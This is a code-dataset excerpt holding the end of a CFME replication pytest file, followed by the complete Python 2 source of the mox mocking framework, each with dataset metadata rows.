@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_appliance_replicate_database_disconnection_with_backlog(request, virtualcenter_provider,
appliance):
"""Tests a database disconnection with backlog
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
replication_conf = appliance.server.zone.region.replication
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname)
# Replication is up and running, now stop the DB on the replication parent
virtualcenter_provider.create()
appl2.db.stop_db_service()
sleep(60)
appl2.db.start_db_service()
wait_for(replication_conf.get_replication_status, fail_condition=False, num_sec=360,
delay=10, fail_func=appl1.server.browser.refresh, message="get_replication_status")
assert replication_conf.get_replication_status()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
wait_for_a_provider()
assert virtualcenter_provider.exists
@pytest.mark.tier(2)
@pytest.mark.ignore_stream("upstream", "5.7") # no config->diagnostics->replication tab in 5.7
def test_distributed_vm_power_control(request, test_vm, virtualcenter_provider, verify_vm_running,
register_event, soft_assert):
"""Tests that a replication parent appliance can control the power state of a
VM being managed by a replication child appliance.
Metadata:
test_flag: replication
"""
appl1, appl2 = get_replication_appliances()
def finalize():
appl1.destroy()
appl2.destroy()
request.addfinalizer(finalize)
appl1.ipapp.browser_steal = True
with appl1.ipapp:
configure_db_replication(appl2.hostname)
virtualcenter_provider.create()
wait_for_a_provider()
appl2.ipapp.browser_steal = True
with appl2.ipapp:
register_event(target_type='VmOrTemplate', target_name=test_vm.name,
event_type='request_vm_poweroff')
register_event(target_type='VmOrTemplate', target_name=test_vm.name,
event_type='vm_poweroff')
test_vm.power_control_from_cfme(option=test_vm.POWER_OFF, cancel=False)
navigate_to(test_vm.provider, 'Details')
test_vm.wait_for_vm_state_change(desired_state=test_vm.STATE_OFF, timeout=900)
soft_assert(test_vm.find_quadicon().data['state'] == 'currentstate-off')
soft_assert(
not test_vm.provider.mgmt.is_vm_running(test_vm.name),
"vm running")
| gpl-2.0 | 7,100,716,636,166,888,000 | 37.055882 | 100 | 0.681428 | false |
patrickhartling/protobuf | python/mox.py | 603 | 38237 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is used for testing. The original is at:
# http://code.google.com/p/pymox/
"""Mox, an object-mocking framework for Python.
Mox works in the record-replay-verify paradigm. When you first create
a mock object, it is in record mode. You then programmatically set
the expected behavior of the mock object (what methods are to be
called on it, with what parameters, what they should return, and in
what order).
Once you have set up the expected mock behavior, you put it in replay
mode. Now the mock responds to method calls just as you told it to.
If an unexpected method (or an expected method with unexpected
parameters) is called, then an exception will be raised.
Once you are done interacting with the mock, you need to verify that
all the expected interactions occured. (Maybe your code exited
prematurely without calling some cleanup method!) The verify phase
ensures that every expected method was called; otherwise, an exception
will be raised.
Suggested usage / workflow:
# Create Mox factory
my_mox = Mox()
# Create a mock data access object
mock_dao = my_mox.CreateMock(DAOClass)
# Set up expected behavior
mock_dao.RetrievePersonWithIdentifier('1').AndReturn(person)
mock_dao.DeletePerson(person)
# Put mocks in replay mode
my_mox.ReplayAll()
# Inject mock object and run test
controller.SetDao(mock_dao)
controller.DeletePersonById('1')
# Verify all methods were called as expected
my_mox.VerifyAll()
"""
from collections import deque
import re
import types
import unittest
import stubout
class Error(AssertionError):
"""Base exception for this module."""
pass
class ExpectedMethodCallsError(Error):
"""Raised when Verify() is called before all expected methods have been called
"""
def __init__(self, expected_methods):
"""Init exception.
Args:
# expected_methods: A sequence of MockMethod objects that should have been
# called.
expected_methods: [MockMethod]
Raises:
ValueError: if expected_methods contains no methods.
"""
if not expected_methods:
raise ValueError("There must be at least one expected method")
Error.__init__(self)
self._expected_methods = expected_methods
def __str__(self):
calls = "\n".join(["%3d. %s" % (i, m)
for i, m in enumerate(self._expected_methods)])
return "Verify: Expected methods never called:\n%s" % (calls,)
class UnexpectedMethodCallError(Error):
"""Raised when an unexpected method is called.
This can occur if a method is called with incorrect parameters, or out of the
specified order.
"""
def __init__(self, unexpected_method, expected):
"""Init exception.
Args:
# unexpected_method: MockMethod that was called but was not at the head of
# the expected_method queue.
# expected: MockMethod or UnorderedGroup the method should have
# been in.
unexpected_method: MockMethod
expected: MockMethod or UnorderedGroup
"""
Error.__init__(self)
self._unexpected_method = unexpected_method
self._expected = expected
def __str__(self):
return "Unexpected method call: %s. Expecting: %s" % \
(self._unexpected_method, self._expected)
class UnknownMethodCallError(Error):
"""Raised if an unknown method is requested of the mock object."""
def __init__(self, unknown_method_name):
"""Init exception.
Args:
# unknown_method_name: Method call that is not part of the mocked class's
# public interface.
unknown_method_name: str
"""
Error.__init__(self)
self._unknown_method_name = unknown_method_name
def __str__(self):
return "Method called is not a member of the object: %s" % \
self._unknown_method_name
class Mox(object):
"""Mox: a factory for creating mock objects."""
# A list of types that should be stubbed out with MockObjects (as
# opposed to MockAnythings).
_USE_MOCK_OBJECT = [types.ClassType, types.InstanceType, types.ModuleType,
types.ObjectType, types.TypeType]
def __init__(self):
"""Initialize a new Mox."""
self._mock_objects = []
self.stubs = stubout.StubOutForTesting()
def CreateMock(self, class_to_mock):
"""Create a new mock object.
Args:
# class_to_mock: the class to be mocked
class_to_mock: class
Returns:
MockObject that can be used as the class_to_mock would be.
"""
new_mock = MockObject(class_to_mock)
self._mock_objects.append(new_mock)
return new_mock
def CreateMockAnything(self):
"""Create a mock that will accept any method calls.
This does not enforce an interface.
"""
new_mock = MockAnything()
self._mock_objects.append(new_mock)
return new_mock
def ReplayAll(self):
"""Set all mock objects to replay mode."""
for mock_obj in self._mock_objects:
mock_obj._Replay()
def VerifyAll(self):
"""Call verify on all mock objects created."""
for mock_obj in self._mock_objects:
mock_obj._Verify()
def ResetAll(self):
"""Call reset on all mock objects. This does not unset stubs."""
for mock_obj in self._mock_objects:
mock_obj._Reset()
def StubOutWithMock(self, obj, attr_name, use_mock_anything=False):
"""Replace a method, attribute, etc. with a Mock.
This will replace a class or module with a MockObject, and everything else
(method, function, etc) with a MockAnything. This can be overridden to
always use a MockAnything by setting use_mock_anything to True.
Args:
obj: A Python object (class, module, instance, callable).
attr_name: str. The name of the attribute to replace with a mock.
use_mock_anything: bool. True if a MockAnything should be used regardless
of the type of attribute.
"""
attr_to_replace = getattr(obj, attr_name)
if type(attr_to_replace) in self._USE_MOCK_OBJECT and not use_mock_anything:
stub = self.CreateMock(attr_to_replace)
else:
stub = self.CreateMockAnything()
self.stubs.Set(obj, attr_name, stub)
def UnsetStubs(self):
"""Restore stubs to their original state."""
self.stubs.UnsetAll()
def Replay(*args):
"""Put mocks into Replay mode.
Args:
# args is any number of mocks to put into replay mode.
"""
for mock in args:
mock._Replay()
def Verify(*args):
"""Verify mocks.
Args:
# args is any number of mocks to be verified.
"""
for mock in args:
mock._Verify()
def Reset(*args):
"""Reset mocks.
Args:
# args is any number of mocks to be reset.
"""
for mock in args:
mock._Reset()
class MockAnything:
"""A mock that can be used to mock anything.
This is helpful for mocking classes that do not provide a public interface.
"""
def __init__(self):
""" """
self._Reset()
def __getattr__(self, method_name):
"""Intercept method calls on this object.
A new MockMethod is returned that is aware of the MockAnything's
state (record or replay). The call will be recorded or replayed
by the MockMethod's __call__.
Args:
# method name: the name of the method being called.
method_name: str
Returns:
A new MockMethod aware of MockAnything's state (record or replay).
"""
return self._CreateMockMethod(method_name)
def _CreateMockMethod(self, method_name):
"""Create a new mock method call and return it.
Args:
# method name: the name of the method being called.
method_name: str
Returns:
A new MockMethod aware of MockAnything's state (record or replay).
"""
return MockMethod(method_name, self._expected_calls_queue,
self._replay_mode)
def __nonzero__(self):
"""Return 1 for nonzero so the mock can be used as a conditional."""
return 1
def __eq__(self, rhs):
"""Provide custom logic to compare objects."""
return (isinstance(rhs, MockAnything) and
self._replay_mode == rhs._replay_mode and
self._expected_calls_queue == rhs._expected_calls_queue)
def __ne__(self, rhs):
"""Provide custom logic to compare objects."""
return not self == rhs
def _Replay(self):
"""Start replaying expected method calls."""
self._replay_mode = True
def _Verify(self):
"""Verify that all of the expected calls have been made.
Raises:
ExpectedMethodCallsError: if there are still more method calls in the
expected queue.
"""
# If the list of expected calls is not empty, raise an exception
if self._expected_calls_queue:
# The last MultipleTimesGroup is not popped from the queue.
if (len(self._expected_calls_queue) == 1 and
isinstance(self._expected_calls_queue[0], MultipleTimesGroup) and
self._expected_calls_queue[0].IsSatisfied()):
pass
else:
raise ExpectedMethodCallsError(self._expected_calls_queue)
def _Reset(self):
"""Reset the state of this mock to record mode with an empty queue."""
# Maintain a list of method calls we are expecting
self._expected_calls_queue = deque()
# Make sure we are in setup mode, not replay mode
self._replay_mode = False
class MockObject(MockAnything, object):
"""A mock object that simulates the public/protected interface of a class."""
def __init__(self, class_to_mock):
"""Initialize a mock object.
This determines the methods and properties of the class and stores them.
Args:
# class_to_mock: class to be mocked
class_to_mock: class
"""
# This is used to hack around the mixin/inheritance of MockAnything, which
# is not a proper object (it can be anything. :-)
MockAnything.__dict__['__init__'](self)
# Get a list of all the public and special methods we should mock.
self._known_methods = set()
self._known_vars = set()
self._class_to_mock = class_to_mock
for method in dir(class_to_mock):
if callable(getattr(class_to_mock, method)):
self._known_methods.add(method)
else:
self._known_vars.add(method)
def __getattr__(self, name):
"""Intercept attribute request on this object.
If the attribute is a public class variable, it will be returned and not
recorded as a call.
If the attribute is not a variable, it is handled like a method
call. The method name is checked against the set of mockable
methods, and a new MockMethod is returned that is aware of the
MockObject's state (record or replay). The call will be recorded
or replayed by the MockMethod's __call__.
Args:
# name: the name of the attribute being requested.
name: str
Returns:
Either a class variable or a new MockMethod that is aware of the state
of the mock (record or replay).
Raises:
UnknownMethodCallError if the MockObject does not mock the requested
method.
"""
if name in self._known_vars:
return getattr(self._class_to_mock, name)
if name in self._known_methods:
return self._CreateMockMethod(name)
raise UnknownMethodCallError(name)
def __eq__(self, rhs):
"""Provide custom logic to compare objects."""
return (isinstance(rhs, MockObject) and
self._class_to_mock == rhs._class_to_mock and
self._replay_mode == rhs._replay_mode and
self._expected_calls_queue == rhs._expected_calls_queue)
def __setitem__(self, key, value):
"""Provide custom logic for mocking classes that support item assignment.
Args:
key: Key to set the value for.
value: Value to set.
Returns:
Expected return value in replay mode. A MockMethod object for the
__setitem__ method that has already been called if not in replay mode.
Raises:
TypeError if the underlying class does not support item assignment.
UnexpectedMethodCallError if the object does not expect the call to
__setitem__.
"""
setitem = self._class_to_mock.__dict__.get('__setitem__', None)
# Verify the class supports item assignment.
if setitem is None:
raise TypeError('object does not support item assignment')
# If we are in replay mode then simply call the mock __setitem__ method.
if self._replay_mode:
return MockMethod('__setitem__', self._expected_calls_queue,
self._replay_mode)(key, value)
# Otherwise, create a mock method __setitem__.
return self._CreateMockMethod('__setitem__')(key, value)
def __getitem__(self, key):
"""Provide custom logic for mocking classes that are subscriptable.
Args:
key: Key to return the value for.
Returns:
Expected return value in replay mode. A MockMethod object for the
__getitem__ method that has already been called if not in replay mode.
Raises:
TypeError if the underlying class is not subscriptable.
UnexpectedMethodCallError if the object does not expect the call to
__setitem__.
"""
getitem = self._class_to_mock.__dict__.get('__getitem__', None)
# Verify the class supports item assignment.
if getitem is None:
raise TypeError('unsubscriptable object')
# If we are in replay mode then simply call the mock __getitem__ method.
if self._replay_mode:
return MockMethod('__getitem__', self._expected_calls_queue,
self._replay_mode)(key)
# Otherwise, create a mock method __getitem__.
return self._CreateMockMethod('__getitem__')(key)
def __call__(self, *params, **named_params):
"""Provide custom logic for mocking classes that are callable."""
# Verify the class we are mocking is callable
callable = self._class_to_mock.__dict__.get('__call__', None)
if callable is None:
raise TypeError('Not callable')
# Because the call is happening directly on this object instead of a method,
# the call on the mock method is made right here
mock_method = self._CreateMockMethod('__call__')
return mock_method(*params, **named_params)
@property
def __class__(self):
"""Return the class that is being mocked."""
return self._class_to_mock
class MockMethod(object):
"""Callable mock method.
A MockMethod should act exactly like the method it mocks, accepting parameters
and returning a value, or throwing an exception (as specified). When this
method is called, it can optionally verify whether the called method (name and
signature) matches the expected method.
"""
def __init__(self, method_name, call_queue, replay_mode):
"""Construct a new mock method.
Args:
# method_name: the name of the method
# call_queue: deque of calls, verify this call against the head, or add
# this call to the queue.
# replay_mode: False if we are recording, True if we are verifying calls
# against the call queue.
method_name: str
call_queue: list or deque
replay_mode: bool
"""
self._name = method_name
self._call_queue = call_queue
if not isinstance(call_queue, deque):
self._call_queue = deque(self._call_queue)
self._replay_mode = replay_mode
self._params = None
self._named_params = None
self._return_value = None
self._exception = None
self._side_effects = None
def __call__(self, *params, **named_params):
"""Log parameters and return the specified return value.
If the Mock(Anything/Object) associated with this call is in record mode,
this MockMethod will be pushed onto the expected call queue. If the mock
is in replay mode, this will pop a MockMethod off the top of the queue and
verify this call is equal to the expected call.
Raises:
UnexpectedMethodCall if this call is supposed to match an expected method
call and it does not.
"""
self._params = params
self._named_params = named_params
if not self._replay_mode:
self._call_queue.append(self)
return self
expected_method = self._VerifyMethodCall()
if expected_method._side_effects:
expected_method._side_effects(*params, **named_params)
if expected_method._exception:
raise expected_method._exception
return expected_method._return_value
def __getattr__(self, name):
"""Raise an AttributeError with a helpful message."""
raise AttributeError('MockMethod has no attribute "%s". '
'Did you remember to put your mocks in replay mode?' % name)
def _PopNextMethod(self):
"""Pop the next method from our call queue."""
try:
return self._call_queue.popleft()
except IndexError:
raise UnexpectedMethodCallError(self, None)
def _VerifyMethodCall(self):
"""Verify the called method is expected.
This can be an ordered method, or part of an unordered set.
Returns:
The expected mock method.
Raises:
UnexpectedMethodCall if the method called was not expected.
"""
expected = self._PopNextMethod()
# Loop here, because we might have a MethodGroup followed by another
# group.
while isinstance(expected, MethodGroup):
expected, method = expected.MethodCalled(self)
if method is not None:
return method
# This is a mock method, so just check equality.
if expected != self:
raise UnexpectedMethodCallError(self, expected)
return expected
def __str__(self):
params = ', '.join(
[repr(p) for p in self._params or []] +
['%s=%r' % x for x in sorted((self._named_params or {}).items())])
desc = "%s(%s) -> %r" % (self._name, params, self._return_value)
return desc
def __eq__(self, rhs):
"""Test whether this MockMethod is equivalent to another MockMethod.
Args:
# rhs: the right hand side of the test
rhs: MockMethod
"""
return (isinstance(rhs, MockMethod) and
self._name == rhs._name and
self._params == rhs._params and
self._named_params == rhs._named_params)
def __ne__(self, rhs):
"""Test whether this MockMethod is not equivalent to another MockMethod.
Args:
# rhs: the right hand side of the test
rhs: MockMethod
"""
return not self == rhs
def GetPossibleGroup(self):
"""Returns a possible group from the end of the call queue or None if no
other methods are on the stack.
"""
# Remove this method from the tail of the queue so we can add it to a group.
this_method = self._call_queue.pop()
assert this_method == self
# Determine if the tail of the queue is a group, or just a regular ordered
# mock method.
group = None
try:
group = self._call_queue[-1]
except IndexError:
pass
return group
def _CheckAndCreateNewGroup(self, group_name, group_class):
"""Checks if the last method (a possible group) is an instance of our
group_class. Adds the current method to this group or creates a new one.
Args:
group_name: the name of the group.
group_class: the class used to create instance of this new group
"""
group = self.GetPossibleGroup()
# If this is a group, and it is the correct group, add the method.
if isinstance(group, group_class) and group.group_name() == group_name:
group.AddMethod(self)
return self
# Create a new group and add the method.
new_group = group_class(group_name)
new_group.AddMethod(self)
self._call_queue.append(new_group)
return self
def InAnyOrder(self, group_name="default"):
"""Move this method into a group of unordered calls.
A group of unordered calls must be defined together, and must be executed
in full before the next expected method can be called. There can be
multiple groups that are expected serially, if they are given
different group names. The same group name can be reused if there is a
standard method call, or a group with a different name, spliced between
usages.
Args:
group_name: the name of the unordered group.
Returns:
self
"""
return self._CheckAndCreateNewGroup(group_name, UnorderedGroup)
def MultipleTimes(self, group_name="default"):
"""Move this method into group of calls which may be called multiple times.
A group of repeating calls must be defined together, and must be executed in
full before the next expected mehtod can be called.
Args:
group_name: the name of the unordered group.
Returns:
self
"""
return self._CheckAndCreateNewGroup(group_name, MultipleTimesGroup)
def AndReturn(self, return_value):
"""Set the value to return when this method is called.
Args:
# return_value can be anything.
"""
self._return_value = return_value
return return_value
def AndRaise(self, exception):
"""Set the exception to raise when this method is called.
Args:
# exception: the exception to raise when this method is called.
exception: Exception
"""
self._exception = exception
def WithSideEffects(self, side_effects):
"""Set the side effects that are simulated when this method is called.
Args:
side_effects: A callable which modifies the parameters or other relevant
state which a given test case depends on.
Returns:
Self for chaining with AndReturn and AndRaise.
"""
self._side_effects = side_effects
return self
class Comparator:
"""Base class for all Mox comparators.
A Comparator can be used as a parameter to a mocked method when the exact
value is not known. For example, the code you are testing might build up a
long SQL string that is passed to your mock DAO. You're only interested that
the IN clause contains the proper primary keys, so you can set your mock
up as follows:
mock_dao.RunQuery(StrContains('IN (1, 2, 4, 5)')).AndReturn(mock_result)
Now whatever query is passed in must contain the string 'IN (1, 2, 4, 5)'.
A Comparator may replace one or more parameters, for example:
# return at most 10 rows
mock_dao.RunQuery(StrContains('SELECT'), 10)
or
# Return some non-deterministic number of rows
mock_dao.RunQuery(StrContains('SELECT'), IsA(int))
"""
def equals(self, rhs):
"""Special equals method that all comparators must implement.
Args:
rhs: any python object
"""
raise NotImplementedError, 'method must be implemented by a subclass.'
def __eq__(self, rhs):
return self.equals(rhs)
def __ne__(self, rhs):
return not self.equals(rhs)
class IsA(Comparator):
"""This class wraps a basic Python type or class. It is used to verify
that a parameter is of the given type or class.
Example:
mock_dao.Connect(IsA(DbConnectInfo))
"""
def __init__(self, class_name):
"""Initialize IsA
Args:
class_name: basic python type or a class
"""
self._class_name = class_name
def equals(self, rhs):
"""Check to see if the RHS is an instance of class_name.
Args:
# rhs: the right hand side of the test
rhs: object
Returns:
bool
"""
try:
return isinstance(rhs, self._class_name)
except TypeError:
# Check raw types if there was a type error. This is helpful for
# things like cStringIO.StringIO.
return type(rhs) == type(self._class_name)
def __repr__(self):
return str(self._class_name)
class IsAlmost(Comparator):
"""Comparison class used to check whether a parameter is nearly equal
to a given value. Generally useful for floating point numbers.
Example mock_dao.SetTimeout((IsAlmost(3.9)))
"""
def __init__(self, float_value, places=7):
"""Initialize IsAlmost.
Args:
float_value: The value for making the comparison.
places: The number of decimal places to round to.
"""
self._float_value = float_value
self._places = places
def equals(self, rhs):
"""Check to see if RHS is almost equal to float_value
Args:
rhs: the value to compare to float_value
Returns:
bool
"""
try:
return round(rhs-self._float_value, self._places) == 0
except TypeError:
# This is probably because either float_value or rhs is not a number.
return False
def __repr__(self):
return str(self._float_value)
class StrContains(Comparator):
"""Comparison class used to check whether a substring exists in a
string parameter. This can be useful in mocking a database with SQL
passed in as a string parameter, for example.
Example:
mock_dao.RunQuery(StrContains('IN (1, 2, 4, 5)')).AndReturn(mock_result)
"""
def __init__(self, search_string):
"""Initialize.
Args:
# search_string: the string you are searching for
search_string: str
"""
self._search_string = search_string
def equals(self, rhs):
"""Check to see if the search_string is contained in the rhs string.
Args:
# rhs: the right hand side of the test
rhs: object
Returns:
bool
"""
try:
return rhs.find(self._search_string) > -1
except Exception:
return False
def __repr__(self):
return '<str containing \'%s\'>' % self._search_string
class Regex(Comparator):
"""Checks if a string matches a regular expression.
This uses a given regular expression to determine equality.
"""
def __init__(self, pattern, flags=0):
"""Initialize.
Args:
# pattern is the regular expression to search for
pattern: str
# flags passed to re.compile function as the second argument
flags: int
"""
self.regex = re.compile(pattern, flags=flags)
def equals(self, rhs):
"""Check to see if rhs matches regular expression pattern.
Returns:
bool
"""
return self.regex.search(rhs) is not None
def __repr__(self):
s = '<regular expression \'%s\'' % self.regex.pattern
if self.regex.flags:
s += ', flags=%d' % self.regex.flags
s += '>'
return s
class In(Comparator):
"""Checks whether an item (or key) is in a list (or dict) parameter.
Example:
mock_dao.GetUsersInfo(In('expectedUserName')).AndReturn(mock_result)
"""
def __init__(self, key):
"""Initialize.
Args:
# key is any thing that could be in a list or a key in a dict
"""
self._key = key
def equals(self, rhs):
"""Check to see whether key is in rhs.
Args:
rhs: dict
Returns:
bool
"""
return self._key in rhs
def __repr__(self):
return '<sequence or map containing \'%s\'>' % self._key
class ContainsKeyValue(Comparator):
"""Checks whether a key/value pair is in a dict parameter.
Example:
mock_dao.UpdateUsers(ContainsKeyValue('stevepm', stevepm_user_info))
"""
def __init__(self, key, value):
"""Initialize.
Args:
# key: a key in a dict
# value: the corresponding value
"""
self._key = key
self._value = value
def equals(self, rhs):
"""Check whether the given key/value pair is in the rhs dict.
Returns:
bool
"""
try:
return rhs[self._key] == self._value
except Exception:
return False
def __repr__(self):
return '<map containing the entry \'%s: %s\'>' % (self._key, self._value)
class SameElementsAs(Comparator):
"""Checks whether iterables contain the same elements (ignoring order).
Example:
mock_dao.ProcessUsers(SameElementsAs('stevepm', 'salomaki'))
"""
def __init__(self, expected_seq):
"""Initialize.
Args:
expected_seq: a sequence
"""
self._expected_seq = expected_seq
def equals(self, actual_seq):
"""Check to see whether actual_seq has same elements as expected_seq.
Args:
actual_seq: sequence
Returns:
bool
"""
try:
expected = dict([(element, None) for element in self._expected_seq])
actual = dict([(element, None) for element in actual_seq])
except TypeError:
# Fall back to slower list-compare if any of the objects are unhashable.
expected = list(self._expected_seq)
actual = list(actual_seq)
expected.sort()
actual.sort()
return expected == actual
def __repr__(self):
return '<sequence with same elements as \'%s\'>' % self._expected_seq
class And(Comparator):
"""Evaluates one or more Comparators on RHS and returns an AND of the results.
"""
def __init__(self, *args):
"""Initialize.
Args:
*args: One or more Comparator
"""
self._comparators = args
def equals(self, rhs):
"""Checks whether all Comparators are equal to rhs.
Args:
# rhs: can be anything
Returns:
bool
"""
for comparator in self._comparators:
if not comparator.equals(rhs):
return False
return True
def __repr__(self):
return '<AND %s>' % str(self._comparators)
class Or(Comparator):
"""Evaluates one or more Comparators on RHS and returns an OR of the results.
"""
def __init__(self, *args):
"""Initialize.
Args:
*args: One or more Mox comparators
"""
self._comparators = args
def equals(self, rhs):
"""Checks whether any Comparator is equal to rhs.
Args:
# rhs: can be anything
Returns:
bool
"""
for comparator in self._comparators:
if comparator.equals(rhs):
return True
return False
def __repr__(self):
return '<OR %s>' % str(self._comparators)
class Func(Comparator):
"""Call a function that should verify the parameter passed in is correct.
You may need the ability to perform more advanced operations on the parameter
in order to validate it. You can use this to have a callable validate any
parameter. The callable should return either True or False.
Example:
def myParamValidator(param):
# Advanced logic here
return True
mock_dao.DoSomething(Func(myParamValidator), true)
"""
def __init__(self, func):
"""Initialize.
Args:
func: callable that takes one parameter and returns a bool
"""
self._func = func
def equals(self, rhs):
"""Test whether rhs passes the function test.
rhs is passed into func.
Args:
rhs: any python object
Returns:
the result of func(rhs)
"""
return self._func(rhs)
def __repr__(self):
return str(self._func)
class IgnoreArg(Comparator):
"""Ignore an argument.
This can be used when we don't care about an argument of a method call.
Example:
# Check if CastMagic is called with 3 as first arg and 'disappear' as third.
mymock.CastMagic(3, IgnoreArg(), 'disappear')
"""
def equals(self, unused_rhs):
"""Ignores arguments and returns True.
Args:
unused_rhs: any python object
Returns:
always returns True
"""
return True
def __repr__(self):
return '<IgnoreArg>'
class MethodGroup(object):
"""Base class containing common behaviour for MethodGroups."""
def __init__(self, group_name):
self._group_name = group_name
def group_name(self):
return self._group_name
def __str__(self):
return '<%s "%s">' % (self.__class__.__name__, self._group_name)
def AddMethod(self, mock_method):
raise NotImplementedError
def MethodCalled(self, mock_method):
raise NotImplementedError
def IsSatisfied(self):
raise NotImplementedError
class UnorderedGroup(MethodGroup):
"""UnorderedGroup holds a set of method calls that may occur in any order.
This construct is helpful for non-deterministic events, such as iterating
over the keys of a dict.
"""
def __init__(self, group_name):
super(UnorderedGroup, self).__init__(group_name)
self._methods = []
def AddMethod(self, mock_method):
"""Add a method to this group.
Args:
mock_method: A mock method to be added to this group.
"""
self._methods.append(mock_method)
def MethodCalled(self, mock_method):
"""Remove a method call from the group.
If the method is not in the set, an UnexpectedMethodCallError will be
raised.
Args:
mock_method: a mock method that should be equal to a method in the group.
Returns:
The mock method from the group
Raises:
UnexpectedMethodCallError if the mock_method was not in the group.
"""
# Check to see if this method exists, and if so, remove it from the set
# and return it.
for method in self._methods:
if method == mock_method:
# Remove the called mock_method instead of the method in the group.
# The called method will match any comparators when equality is checked
# during removal. The method in the group could pass a comparator to
# another comparator during the equality check.
self._methods.remove(mock_method)
# If this group is not empty, put it back at the head of the queue.
if not self.IsSatisfied():
mock_method._call_queue.appendleft(self)
return self, method
raise UnexpectedMethodCallError(mock_method, self)
def IsSatisfied(self):
"""Return True if there are not any methods in this group."""
return len(self._methods) == 0
class MultipleTimesGroup(MethodGroup):
"""MultipleTimesGroup holds methods that may be called any number of times.
Note: Each method must be called at least once.
This is helpful, if you don't know or care how many times a method is called.
"""
def __init__(self, group_name):
super(MultipleTimesGroup, self).__init__(group_name)
self._methods = set()
self._methods_called = set()
def AddMethod(self, mock_method):
"""Add a method to this group.
Args:
mock_method: A mock method to be added to this group.
"""
self._methods.add(mock_method)
def MethodCalled(self, mock_method):
"""Remove a method call from the group.
If the method is not in the set, an UnexpectedMethodCallError will be
raised.
Args:
mock_method: a mock method that should be equal to a method in the group.
Returns:
The mock method from the group
Raises:
UnexpectedMethodCallError if the mock_method was not in the group.
"""
# Check to see if this method exists, and if so add it to the set of
# called methods.
for method in self._methods:
if method == mock_method:
self._methods_called.add(mock_method)
# Always put this group back on top of the queue, because we don't know
# when we are done.
mock_method._call_queue.appendleft(self)
return self, method
if self.IsSatisfied():
next_method = mock_method._PopNextMethod();
return next_method, None
else:
raise UnexpectedMethodCallError(mock_method, self)
def IsSatisfied(self):
"""Return True if all methods in this group are called at least once."""
# NOTE(psycho): We can't use the simple set difference here because we want
# to match different parameters which are considered the same e.g. IsA(str)
# and some string. This solution is O(n^2) but n should be small.
tmp = self._methods.copy()
for called in self._methods_called:
for expected in tmp:
if called == expected:
tmp.remove(expected)
if not tmp:
return True
break
return False
class MoxMetaTestBase(type):
"""Metaclass to add mox cleanup and verification to every test.
As the mox unit testing class is being constructed (MoxTestBase or a
subclass), this metaclass will modify all test functions to call the
CleanUpMox method of the test class after they finish. This means that
unstubbing and verifying will happen for every test with no additional code,
and any failures will result in test failures as opposed to errors.
"""
def __init__(cls, name, bases, d):
type.__init__(cls, name, bases, d)
# also get all the attributes from the base classes to account
# for a case when test class is not the immediate child of MoxTestBase
for base in bases:
for attr_name in dir(base):
d[attr_name] = getattr(base, attr_name)
for func_name, func in d.items():
if func_name.startswith('test') and callable(func):
setattr(cls, func_name, MoxMetaTestBase.CleanUpTest(cls, func))
@staticmethod
def CleanUpTest(cls, func):
"""Adds Mox cleanup code to any MoxTestBase method.
Always unsets stubs after a test. Will verify all mocks for tests that
otherwise pass.
Args:
cls: MoxTestBase or subclass; the class whose test method we are altering.
func: method; the method of the MoxTestBase test class we wish to alter.
Returns:
The modified method.
"""
def new_method(self, *args, **kwargs):
mox_obj = getattr(self, 'mox', None)
cleanup_mox = False
if mox_obj and isinstance(mox_obj, Mox):
cleanup_mox = True
try:
func(self, *args, **kwargs)
finally:
if cleanup_mox:
mox_obj.UnsetStubs()
if cleanup_mox:
mox_obj.VerifyAll()
new_method.__name__ = func.__name__
new_method.__doc__ = func.__doc__
new_method.__module__ = func.__module__
return new_method
class MoxTestBase(unittest.TestCase):
"""Convenience test class to make stubbing easier.
Sets up a "mox" attribute which is an instance of Mox - any mox tests will
want this. Also automatically unsets any stubs and verifies that all mock
methods have been called at the end of each test, eliminating boilerplate
code.
"""
__metaclass__ = MoxMetaTestBase
def setUp(self):
self.mox = Mox()
| bsd-3-clause | 5,966,710,906,291,615,000 | 26.292648 | 80 | 0.660277 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.